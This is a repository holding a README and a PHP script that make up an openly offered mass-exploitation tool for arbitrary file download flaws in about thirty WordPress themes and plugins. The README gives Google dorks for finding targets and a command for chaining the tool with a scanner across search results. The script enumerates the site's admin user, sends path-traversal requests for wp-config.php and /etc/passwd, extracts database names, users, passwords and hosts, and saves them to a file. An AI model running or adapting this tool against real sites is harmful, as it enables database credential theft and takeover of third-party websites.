├── README.md
└── Wordpress-A.F.D-Verification.1.0.php


/README.md:
--------------------------------------------------------------------------------
  1 | - Wordpress A.F.D Verification / INURL - BRASIL
  2 | ------
  3 | >Check Vulnerability Arbitrary File Download the CMS Wordpress
  4 | 
  5 | ```
  6 |  NAME:                 Wordpress A.F.D Verification/ INURL - BRASIL
  7 |  TIPE:                 Arbitrary File Download
  8 |  Tested on:            Linux 
  9 |  EXECUTE:              php exploit.php www.target.gov.us
 10 |  OUTPUT:               WORDPRES_A_F_D.txt
 11 |  AUTOR:                GoogleINURL
 12 |  Blog:                 http://blog.inurl.com.br
 13 |  Twitter:              https://twitter.com/googleinurl
 14 |  Fanpage:              https://fb.com/InurlBrasil
 15 |  PASTEBIN:             http://pastebin.com/u/googleinurl
 16 |  GIT:                  https://github.com/googleinurl
 17 |  YOUTUBE               https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
 18 |  PACKETSTORMSECURITY:: http://packetstormsecurity.com/user/googleinurl/
 19 | ```
 20 | - Demonstration
 21 | ------
 22 | ![alt text](http://i.imgur.com/45BFlNe.png "Wordpress A.F.D Verification/ INURL - BRASIL.")
 23 | 
 24 | - Themes affected and Dorks search
 25 | ------
 26 | ```
 27 |  ------------------------------------------------------------------------------
 28 |   WordPress revslide Arbitrary File Download
 29 |   Google Dork:: inurl:revslider_show_image -intext:revslider_show_image
 30 |  ------------------------------------------------------------------------------
 31 |  
 32 |  WordPress Ultimatum Theme Arbitrary File Download
 33 |  Vendor Homepage:: http://ultimatumtheme.com/ultimatum-themes/s
 34 |  Google Dork:: "Index of" & /wp-content/themes/ultimatum
 35 |  ------------------------------------------------------------------------------
 36 |  
 37 |  WordPress Medicate Theme Arbitrary File Download
 38 |  Vendor Homepage:: http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916
 39 |  Google Dork:: "Index of" & /wp-content/themes/medicate/
 40 |  ------------------------------------------------------------------------------
 41 |  
 42 |  WordPress Centum Theme Arbitrary File Download
 43 |  Vendor Homepage:: http://themeforest.net/item/centum-responsive-wordpress-theme/3216603
 44 |  Google Dork:: "Index of" & /wp-content/themes/Centum/
 45 |  ------------------------------------------------------------------------------
 46 |  
 47 |  WordPress Avada Theme Arbitrary File Download
 48 |  Vendor Homepage:: http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226
 49 |  Google Dork:: "Index of" & /wp-content/themes/Avada/
 50 |  ------------------------------------------------------------------------------
 51 |  
 52 |  WordPress Striking Theme & E-Commerce Arbitrary File Download
 53 |  Vendor Homepage:: http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763
 54 |  Google Dork:: "Index of" & /wp-content/themes/striking_r/
 55 |  ------------------------------------------------------------------------------
 56 |  
 57 |  WordPress Beach Apollo Arbitrary File Download
 58 |  Vendor Homepage:: https://www.authenticthemes.com/theme/apollo/
 59 |  Google Dork:: "Index of" & /wp-content/themes/beach_apollo/
 60 |  ------------------------------------------------------------------------------
 61 |  
 62 |  WordPress index of ajax-store-locator 
 63 |  Google Dork:: inurl:ajax-store-locator
 64 |  Vendor Homepage:: http://codecanyon.net/item/ajax-store-locator-wordpress/5293356
 65 |  ------------------------------------------------------------------------------
 66 |  
 67 |  WordPress cuckootap Theme Arbitrary File Download
 68 |  Google Dork:: "Index of" & /wp-content/themes/cuckootap/
 69 |  Vendor Homepage:: http://www.cuckoothemes.com/
 70 |  ------------------------------------------------------------------------------ 
 71 |  
 72 |  WordPress IncredibleWP Theme Arbitrary File Download
 73 |  Vendor Homepage:: http://freelancewp.com/wordpress-theme/incredible-wp/
 74 |  Google Dork:: "Index of" & /wp-content/themes/IncredibleWP/
 75 |  ------------------------------------------------------------------------------ 
 76 |  
 77 |  WordPress Ultimatum Theme Arbitrary File Download
 78 |  Vendor Homepage:: http://ultimatumtheme.com/ultimatum-themes/s
 79 |  Google Dork:: "Index of" & /wp-content/themes/ultimatum
 80 |  ------------------------------------------------------------------------------ 
 81 |  
 82 |  WordPress Medicate Theme Arbitrary File Download
 83 |  Vendor Homepage:: http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916
 84 |  Google Dork:: "Index of" & /wp-content/themes/medicate/
 85 |  ------------------------------------------------------------------------------ 
 86 |  
 87 |  WordPress Centum Theme Arbitrary File Download
 88 |  Vendor Homepage:: http://themeforest.net/item/centum-responsive-wordpress-theme/3216603
 89 |  Google Dork:: "Index of" & /wp-content/themes/Centum/
 90 |  ------------------------------------------------------------------------------ 
 91 |  
 92 |  WordPress Avada Theme Arbitrary File Download
 93 |  Vendor Homepage:: http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226
 94 |  Google Dork:: "Index of" & /wp-content/themes/Avada/
 95 |  ------------------------------------------------------------------------------
 96 |   
 97 |  WordPress Striking Theme & E-Commerce Arbitrary File Download
 98 |  Vendor Homepage:: http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763
 99 |  Google Dork:: "Index of" & /wp-content/themes/striking_r/
100 |  ------------------------------------------------------------------------------ 
101 |  
102 |  WordPress Beach Apollo Arbitrary File Download
103 |  Vendor Homepage:: https://www.authenticthemes.com/theme/apollo/
104 |  Google Dork:: "Index of" & /wp-content/themes/beach_apollo/
105 |  ------------------------------------------------------------------------------
106 |  
107 |  WordPress Trinity Theme Arbitrary File Download
108 |  Vendor Homepage:: https://churchthemes.net/themes/trinity/
109 |  Google Dork:: "Index of" & /wp-content/themes/trinity/
110 |  ------------------------------------------------------------------------------
111 |  
112 |  WordPress Lote27 Theme Arbitrary File Download
113 |  Google Dork:: "Index of" & /wp-content/themes/lote27/
114 |  ------------------------------------------------------------------------------
115 |  
116 |  WordPress Revslider Theme Arbitrary File Download
117 |  Vendor Homepage:: http://themeforest.net/item/cuckootap-one-page-parallax-wp-theme-plus-eshop/3512405
118 |  Google Dork:: wp-admin & inurl:revslider_show_image
119 |  ------------------------------------------------------------------------------
120 |  
121 |  Wordpress plugin Justified Image Grid v2.0.1 LFD Exploiter 2015
122 |  Vendor Homepage:: http://codecanyon.net/item/justified-image-grid-premium-wordpress-gallery/2594251
123 |  Google Dork:: inurl:"/plugins/justified-image-grid"
124 |  ------------------------------------------------------------------------------
125 |  
126 |  Wordpress aspose-doc-exporter Plugin Arbitrary File Download Vulnerability
127 |  Vendor Homepage:: https://wordpress.org/plugins/aspose-doc-exporter/developers/
128 |  ------------------------------------------------------------------------------
129 |  
130 |  WordPress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download vulnerability
131 |  Vendor Homepage:: http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380
132 |  Google Dork:: revslider.php "index of"
133 |  ------------------------------------------------------------------------------
134 | 
135 |  Wordpress Theme Divi Arbitrary File Download Vulnerability
136 |  Vendor Homepage:: http://www.elegantthemes.com/gallery/divi/
137 |  Google Dork:: inurl:wp-content/themes/Divi/
138 |  ------------------------------------------------------------------------------
139 | 
140 |  WordPress Aspose Cloud eBook Generator File Download Vulnerability
141 |  Vendor Homepage:: https://wordpress.org/plugins/aspose-cloud-ebook-generator/
142 |  ------------------------------------------------------------------------------
143 | 
144 |  Wordpress Plugin 'WP Mobile Edition' Remote File Disclosure Vulnerability
145 |  Vendor Homepage:: https://wordpress.org/plugins/wp-mobile-edition/
146 |  Google Dork: inurl:?fdx_switcher=mobile
147 |  ------------------------------------------------------------------------------
148 |  
149 |  WordPress WP-Mon Arbitrary File Download Vulnerability
150 |  Vendor Homepage:: https://wordpress.org/plugins/wp-mon/
151 |  Google Dork: inurl:"/wp-content/plugins/wp-mon"
152 |  ------------------------------------------------------------------------------
153 |  
154 |  Wordpress MiwoFTP Plugin 1.0.5 suffers from arbitrary file download vulnerability
155 |  Vendor Homepage:: http://www.miwisoft.com
156 |  Google Dork: inurl:"php?page=miwoftp"
157 |  ------------------------------------------------------------------------------
158 |  
159 | ```
160 |  
161 |  - Dependencies:
162 | ------
163 | ```
164 | sudo apt-get install php5 php5-cli php5-curl
165 | ```
166 | 
167 |  - Execute:
168 | ------
169 | ```
170 |     php {script} {target}
171 | Ex: php wordpress-A.F.D-Verification.php www.target.gov.us
172 | ```
173 | 
174 |  - Use complementing inurlbr scanner:
175 | ------
176 | ```
177 | Ex: ./inurlbr.php --dork 'inurl:revslider_show_image -intext:revslider_show_image' -s '01.txt' -q 1,6 --comand-all 'php xpl.php _TARGET_'
178 | ```
179 | More details about inurlbr scanner: https://github.com/googleinurl/SCANNER-INURLBR
180 | 


--------------------------------------------------------------------------------
/Wordpress-A.F.D-Verification.1.0.php:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/php -q
  2 | <?php
  3 | # ===============================================================================
  4 | # NAME:                 Wordpress A.F.D Verification/ INURL - BRASIL
  5 | # TIPE:                 Arbitrary File Download
  6 | # Tested on:            Linux 
  7 | # EXECUTE:              php exploit.php www.target.gov.us
  8 | # OUTPUT:               WORDPRES_A_F_D.txt
  9 | # AUTOR:                GoogleINURL
 10 | # Blog:                 http://blog.inurl.com.br
 11 | # Twitter:              https://twitter.com/googleinurl
 12 | # Fanpage:              https://fb.com/InurlBrasil
 13 | # PASTEBIN:             http://pastebin.com/u/googleinurl
 14 | # GIT:                  https://github.com/googleinurl
 15 | # YOUTUBE               https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
 16 | # PACKETSTORMSECURITY:: http://packetstormsecurity.com/user/googleinurl/
 17 | # 
 18 | # ------------------------------------------------------------------------------
 19 | #  Comand Exec Scanner INURLBR: 
 20 | # ./inurlbr.php --dork 'inurl:/wp-content/themes/' -q 1,6 -s save.txt --comand-all "php exploit.php _TARGET_"
 21 | # ------------------------------------------------------------------------------
 22 | # 
 23 | # Download Scanner INURLBR:
 24 | # https://github.com/googleinurl/SCANNER-INURLBR
 25 | # ------------------------------------------------------------------------------
 26 | #
 27 | # D O R K'S:
 28 | # ------------------------------------------------------------------------------
 29 | #  WordPress revslide Arbitrary File Download
 30 | #  Google Dork:: inurl:revslider_show_image -intext:revslider_show_image
 31 | # ------------------------------------------------------------------------------
 32 | # 
 33 | # WordPress Ultimatum Theme Arbitrary File Download
 34 | # Vendor Homepage:: http://ultimatumtheme.com/ultimatum-themes/s
 35 | # Google Dork:: "Index of" & /wp-content/themes/ultimatum
 36 | # ------------------------------------------------------------------------------
 37 | # 
 38 | # WordPress Medicate Theme Arbitrary File Download
 39 | # Vendor Homepage:: http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916
 40 | # Google Dork:: "Index of" & /wp-content/themes/medicate/
 41 | # ------------------------------------------------------------------------------
 42 | # 
 43 | # WordPress Centum Theme Arbitrary File Download
 44 | # Vendor Homepage:: http://themeforest.net/item/centum-responsive-wordpress-theme/3216603
 45 | # Google Dork:: "Index of" & /wp-content/themes/Centum/
 46 | # ------------------------------------------------------------------------------
 47 | # 
 48 | # WordPress Avada Theme Arbitrary File Download
 49 | # Vendor Homepage:: http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226
 50 | # Google Dork:: "Index of" & /wp-content/themes/Avada/
 51 | # ------------------------------------------------------------------------------
 52 | # 
 53 | # WordPress Striking Theme & E-Commerce Arbitrary File Download
 54 | # Vendor Homepage:: http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763
 55 | # Google Dork:: "Index of" & /wp-content/themes/striking_r/
 56 | # ------------------------------------------------------------------------------
 57 | # 
 58 | # WordPress Beach Apollo Arbitrary File Download
 59 | # Vendor Homepage:: https://www.authenticthemes.com/theme/apollo/
 60 | # Google Dork:: "Index of" & /wp-content/themes/beach_apollo/
 61 | # ------------------------------------------------------------------------------
 62 | # 
 63 | # WordPress index of ajax-store-locator 
 64 | # Google Dork:: inurl:ajax-store-locator
 65 | # Vendor Homepage:: http://codecanyon.net/item/ajax-store-locator-wordpress/5293356
 66 | # ------------------------------------------------------------------------------
 67 | # 
 68 | # WordPress cuckootap Theme Arbitrary File Download
 69 | # Google Dork:: "Index of" & /wp-content/themes/cuckootap/
 70 | # Vendor Homepage:: http://www.cuckoothemes.com/
 71 | # ------------------------------------------------------------------------------ 
 72 | # 
 73 | # WordPress IncredibleWP Theme Arbitrary File Download
 74 | # Vendor Homepage:: http://freelancewp.com/wordpress-theme/incredible-wp/
 75 | # Google Dork:: "Index of" & /wp-content/themes/IncredibleWP/
 76 | # ------------------------------------------------------------------------------ 
 77 | # 
 78 | # WordPress Ultimatum Theme Arbitrary File Download
 79 | # Vendor Homepage:: http://ultimatumtheme.com/ultimatum-themes/s
 80 | # Google Dork:: "Index of" & /wp-content/themes/ultimatum
 81 | # ------------------------------------------------------------------------------ 
 82 | # 
 83 | # WordPress Medicate Theme Arbitrary File Download
 84 | # Vendor Homepage:: http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916
 85 | # Google Dork:: "Index of" & /wp-content/themes/medicate/
 86 | # ------------------------------------------------------------------------------ 
 87 | # 
 88 | # WordPress Centum Theme Arbitrary File Download
 89 | # Vendor Homepage:: http://themeforest.net/item/centum-responsive-wordpress-theme/3216603
 90 | # Google Dork:: "Index of" & /wp-content/themes/Centum/
 91 | # ------------------------------------------------------------------------------ 
 92 | # 
 93 | # WordPress Avada Theme Arbitrary File Download
 94 | # Vendor Homepage:: http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226
 95 | # Google Dork:: "Index of" & /wp-content/themes/Avada/
 96 | # ------------------------------------------------------------------------------
 97 | #  
 98 | # WordPress Striking Theme & E-Commerce Arbitrary File Download
 99 | # Vendor Homepage:: http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763
100 | # Google Dork:: "Index of" & /wp-content/themes/striking_r/
101 | # ------------------------------------------------------------------------------ 
102 | # 
103 | # WordPress Beach Apollo Arbitrary File Download
104 | # Vendor Homepage:: https://www.authenticthemes.com/theme/apollo/
105 | # Google Dork:: "Index of" & /wp-content/themes/beach_apollo/
106 | # ------------------------------------------------------------------------------
107 | # 
108 | # WordPress Trinity Theme Arbitrary File Download
109 | # Vendor Homepage:: https://churchthemes.net/themes/trinity/
110 | # Google Dork:: "Index of" & /wp-content/themes/trinity/
111 | # ------------------------------------------------------------------------------
112 | # 
113 | # WordPress Lote27 Theme Arbitrary File Download
114 | # Google Dork:: "Index of" & /wp-content/themes/lote27/
115 | # ------------------------------------------------------------------------------
116 | # 
117 | # WordPress Revslider Theme Arbitrary File Download
118 | # Vendor Homepage:: http://themeforest.net/item/cuckootap-one-page-parallax-wp-theme-plus-eshop/3512405
119 | # Google Dork:: wp-admin & inurl:revslider_show_image
120 | # ------------------------------------------------------------------------------
121 | # 
122 | # Wordpress plugin Justified Image Grid v2.0.1 LFD Exploiter 2015
123 | # Vendor Homepage:: http://codecanyon.net/item/justified-image-grid-premium-wordpress-gallery/2594251
124 | # Google Dork:: inurl:"/plugins/justified-image-grid"
125 | # ------------------------------------------------------------------------------
126 | # 
127 | # Wordpress aspose-doc-exporter Plugin Arbitrary File Download Vulnerability
128 | # Vendor Homepage:: https://wordpress.org/plugins/aspose-doc-exporter/developers/
129 | # ------------------------------------------------------------------------------
130 | # 
131 | # WordPress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download vulnerability
132 | # Vendor Homepage:: http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380
133 | # Google Dork:: revslider.php "index of"
134 | # ------------------------------------------------------------------------------
135 | #
136 | # Wordpress Theme Divi Arbitrary File Download Vulnerability
137 | # Vendor Homepage:: http://www.elegantthemes.com/gallery/divi/
138 | # Google Dork:: inurl:wp-content/themes/Divi/
139 | # ------------------------------------------------------------------------------
140 | #
141 | # WordPress Aspose Cloud eBook Generator File Download Vulnerability
142 | # Vendor Homepage:: https://wordpress.org/plugins/aspose-cloud-ebook-generator/
143 | # ------------------------------------------------------------------------------
144 | #
145 | # Wordpress Plugin 'WP Mobile Edition' Remote File Disclosure Vulnerability
146 | # Vendor Homepage:: https://wordpress.org/plugins/wp-mobile-edition/
147 | # Google Dork: inurl:?fdx_switcher=mobile
148 | # ------------------------------------------------------------------------------
149 | #
150 | # WordPress WP-Mon Arbitrary File Download Vulnerability
151 | # Vendor Homepage:: https://wordpress.org/plugins/wp-mon/
152 | # Google Dork: inurl:"/wp-content/plugins/wp-mon"
153 | # ------------------------------------------------------------------------------
154 | #
155 | # Wordpress MiwoFTP Plugin 1.0.5 suffers from arbitrary file download vulnerability
156 | # Vendor Homepage:: http://www.miwisoft.com
157 | # Google Dork: inurl:"php?page=miwoftp"
158 | # ------------------------------------------------------------------------------
159 | # http://i.imgur.com/45BFlNe.png
160 | # ===============================================================================
161 | 
162 | $banner = "  
163 |   _____ 
164 |  (_____)    ____ _   _ _    _ _____  _                 ____                _ _ 
165 |  (() ())  |_   _| \ | | |  | |  __ \| |               |  _ \              (_) |
166 |   \   /     | | |  \| | |  | | |__) | |       ______  | |_) |_ __ __ _ ___ _| |
167 |    \ /      | | | . ` | |  | |  _  /| |      |______| |  _ <| '__/ _` / __| | |
168 |    /=\     _| |_| |\  | |__| | | \ \| |____           | |_) | | | (_| \__ \ | |
169 |   [___]   |_____|_| \_|\____/|_|  \_\______|          |____/|_|  \__,_|___/_|_| 
170 |   \n\033[1;37m0xNeither war between hackers, nor peace for the system.\033[0m\r
171 | ";
172 | 
173 | error_reporting(1);
174 | set_time_limit(0);
175 | ini_set('display_errors', 1);
176 | ini_set('max_execution_time', 0);
177 | ini_set('allow_url_fopen', 1);
178 | ob_implicit_flush(true);
179 | ob_end_flush();
180 | 
181 | function __plus() {
182 | 
183 |     ob_flush();
184 |     flush();
185 | }
186 | 
187 | print empty($argv[1]) ? exit("{$banner}0x[ERROR]: SET URL / Execute: php exploit.php www.target.gov.us\n") : NULL;
188 | $argv[1] = isset($argv[1]) && strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}";
189 | !filter_var($argv[1], FILTER_VALIDATE_URL) ?  exit("{$banner}0x[ERROR]: SET URL / Execute: php exploit.php www.target.gov.us\n") : NULL;
190 | 
191 | print "\r\n{$banner}0x[EXPLOIT NAME]: WORDPRESS A.F.D / INURL - BRASIL";
192 | print "\n------------------------------------------------------------------------------------------------------------------";
193 | __plus();
194 | $users = file_get_contents("{$argv[1]}/?author=1");
195 | __plus();
196 | preg_match('/<title>(.*?)<\/title>/si', $users, $user);
197 | $wpuser = explode('|', $user[1]);
198 | $headers = get_headers($argv[1], 1);
199 | __plus();
200 | print "\n0x ". date("h:m:s") ." [INFO][COD]:: ";
201 | print $headers[0] . (isset($headers[1]) ? ' -> ' . $headers[1] : NULL);
202 | print "\n0x ". date("h:m:s") ." [INFO][Server]:: ";
203 | is_array($headers['Server']) ? print_r($headers['Server'][0]) : print_r($headers['Server']);
204 | print "\n0x ". date("h:m:s") ." [INFO][X-Pingback]:: ";
205 | is_array($headers['X-Pingback']) ? print_r($headers['X-Pingback'][0]) : print_r($headers['X-Pingback']);
206 | print "\n0x ". date("h:m:s") ." [INFO][X-Powered-By]:: ";
207 | is_array($headers['X-Powered-By']) ? print_r($headers['X-Powered-By'][0]) : print_r($headers['X-Powered-By']);
208 | print_r("\n0x ". date("h:m:s") ." [INFO][TARGET]:: {$argv[1]} | [WP USER]:: " . str_replace("\n", '', $wpuser[0]));
209 | print "\n0x ". date("h:m:s") ." [INFO][OUTPUT FILE]:: WORDPRESS_A_F_D.txt\n";
210 | __plus();
211 | 
212 | __request($argv[1], '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php');
213 | 
214 | __request($argv[1], '/wp-content/force-download.php?file=../wp-config.php');
215 | 
216 | __request($argv[1], '/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php');
217 | 
218 | __request($argv[1], '/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php');
219 | 
220 | __request($argv[1], '/wp-content/themes/markant/download.php?file=../../wp-config.php');
221 | 
222 | __request($argv[1], '/wp-content/themes/yakimabait/download.php?file=./wp-config.php');
223 | 
224 | __request($argv[1], '/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php');
225 | 
226 | __request($argv[1], '/wp-content/themes/felis/download.php?file=../wp-config.php');
227 | 
228 | __request($argv[1], '/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php');
229 | 
230 | __request($argv[1], '/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php');
231 | 
232 | __request($argv[1], '/wp-content/themes/epic/includes/download.php?file=wp-config.php');
233 | 
234 | __request($argv[1], '/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php');
235 | 
236 | __request($argv[1], '/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php');
237 | 
238 | __request($argv[1], '/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php');
239 | 
240 | __request($argv[1], '/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php');
241 | 
242 | __request($argv[1], '/wp-content/themes/lote27/download.php?download=../../../wp-config.php');
243 | 
244 | __request($argv[1], '/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php');
245 | 
246 | __request($argv[1], '/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php');
247 | 
248 | __request($argv[1], '/wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/wp-config.php');
249 | 
250 | __request($argv[1], '/wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/wp-config.php');
251 | 
252 | __request($argv[1], '/wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php');
253 | 
254 | __request($argv[1], '/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php');
255 | 
256 | __request($argv[1], '/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php');
257 | 
258 | __request($argv[1], '/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php');
259 | 
260 | __request($argv[1], '/wp-content/plugins/wp-mon/assets/download.php?type=octet/stream&path=../../../../&name=wp-config.php');
261 | 
262 | __request($argv[1], '/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&srt=yes');
263 | 
264 | __request($argv[1], '/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php');
265 | 
266 | __request($argv[1], '/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=../../../../../../../wp-config.php');
267 | 
268 | __request($argv[1], '/?action=cpis_init&cpis-action=f-download&purchase_id=1&cpis_user_email=i0SECLAB@intermal.com&f=../../../../wp-config.php');
269 | 
270 | __request($argv[1], '/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd');
271 | 
272 | __request($argv[1], '/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd');
273 | 
274 | __request($argv[1], '/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress');
275 | 
276 | __request($argv[1], '/wp-content/plugins/image-export/download.php?file=/etc/passwd');
277 | 
278 | function __request($url, $plugin) {
279 | 
280 |     $objcurl = curl_init();
281 |     $caminho = NULL;
282 |     $status = array();
283 | 
284 |     curl_setopt($objcurl, CURLOPT_URL, $url . $plugin);
285 |     curl_setopt($objcurl, CURLOPT_HEADER, 1);
286 |     curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
287 |     curl_setopt($objcurl, CURLOPT_USERAGENT, "::INURLBR::/1.0.1 (compatible; MSIE 5.01; Linux 5.0)");
288 |     curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 20);
289 |     curl_setopt($objcurl, CURLOPT_TIMEOUT, 10);
290 |     
291 |     $corpo = curl_exec($objcurl);
292 | 
293 |     if (preg_match_all("(<b>/.*./wp-content/)", $corpo, $caminho)) {
294 | 
295 |         return __request($url, "{$plugin}&file=" . str_replace('wp-content/', '', $caminho[0][0]) . "wp-config.php");
296 |     }
297 | __plus();
298 | 
299 |     if (preg_match("#DB_NAME#i", $corpo) || preg_match("#root:#i", $corpo) || preg_match("#readfile(#i", $corpo)) {
300 | 
301 | //-----------------------------------------------------------------------------
302 |         preg_match_all("(DB_NAME.*')", $corpo, $status['DB_NAME']);
303 |         preg_match_all("(DB_USER.*')", $corpo, $status['DB_USER']);
304 |         preg_match_all("(DB_PASSWORD.*')", $corpo, $status['DB_PASSWORD']);
305 |         preg_match_all("(DB_HOST.*')", $corpo, $status['DB_HOST']);
306 |         preg_match_all("(DB_CHARSET.*')", $corpo, $status['DB_CHARSET']);
307 |         #FILE PASSWORD
308 |         preg_match_all("(root:.*)", $corpo, $status['pwd1']);
309 |         preg_match_all("(sbin:.*)", $corpo, $status['pwd2']);
310 |         preg_match_all("(ftp:.*)", $corpo, $status['pwd3']);
311 |         preg_match_all("(nobody:.*)", $corpo, $status['pwd4']);
312 |         preg_match_all("(mail:.*)", $corpo, $status['pwd5']);
313 | //-----------------------------------------------------------------------------
314 | __plus();
315 |         $res = "\n------------------------------------------------------------------------------------------------------------------\n\033[0;32m0x ". date("h:m:s") ." [INFO][VULN]::    \033[1;37m [ " . date("d-m-Y H:i:s") . " ]\n";
316 |         $res.= ("\033[0;32m0x ". date("h:m:s") ." [INFO][VULN][DB]::\033[1;37m " . $status['DB_NAME'][0][0]);
317 |         $res.= ("::" . $status['DB_USER'][0][0]);
318 |         $res.= ("::" . $status['DB_PASSWORD'][0][0]);
319 |         $res.= ("::" . $status['DB_HOST'][0][0]);
320 |         $res.= ("::" . $status['DB_CHARSET'][0][0]);
321 |         $res.= (preg_match("#root#i", $corpo) ? "\n\033[0;32m0x ". date("h:m:s") ."[INFO][VULN][FILE_PASSWORD]::\033[1;37m{$status['pwd1'][0][0]} - {$status['pwd2'][0][0]} - {$status['pwd3'][0][0]} - {$status['pwd4'][0][0]} - {$status['pwd5'][0][0]}\033[0m" : NULL);
322 |         $res.= "\n\033[0;32m0x ". date("h:m:s") ." [INFO][VULN][URL]::\033[1;37m{$url}{$plugin}\033[0m";
323 |         $res.= "\n------------------------------------------------------------------------------------------------------------------\n\033[0m";
324 |         print $res;
325 |         $res = str_replace('[1;37m','',str_replace('[0m','',str_replace('[0;32m','',$res)));
326 |         file_put_contents('WORDPRESS_A_F_D.txt', "{$res}\n", FILE_APPEND);
327 | __plus();
328 |     } else {
329 | 
330 |         print "\n\033[1;31m0x ". date("h:m:s") ." [INFO][NOT VULN]::\033[1;37m {$url}{$plugin} \n\033[0m";
331 |     }
332 |     curl_close($objcurl);
333 | __plus();
334 | }
335 | 


--------------------------------------------------------------------------------